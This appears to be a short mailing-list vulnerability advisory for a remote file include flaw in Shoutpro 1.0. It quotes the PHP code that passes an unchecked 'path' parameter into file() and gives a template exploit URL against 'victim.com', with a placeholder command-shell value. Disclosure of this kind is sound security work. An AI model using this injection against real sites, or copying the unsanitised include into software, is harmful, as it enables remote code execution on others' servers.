<<< Date Index >>>     <<< Thread Index >>>

Shoutpro 1.0 Version - Remote File Include Vulnerability

# SaVSaK.CoM | SpC-x - The_BeKiR |

# Shoutpro 1.0 Version - Remote File Include Vulnerability

# Risk : High

# Class: Remote

# Script : Shoutpro

# Credits : SpC-x

# Thanks : The_BeKiR - Ejder - FasTBoY - ERNE - RMx

# Code :

# include("config.php");
# include("functions.php");
# if ($path){
#       $ips = file("$path/lists/bannedips.php");
# } else {
#       $ips = file("lists/bannedips.php");
# }
# if (in_array($REMOTE_ADDR,$ips)) {   
#       echo($bannedmessage);
#       die;
# }

# Vulnerable :

# http://www.victim.com/Shoutpro/include.php?path=Command-Shell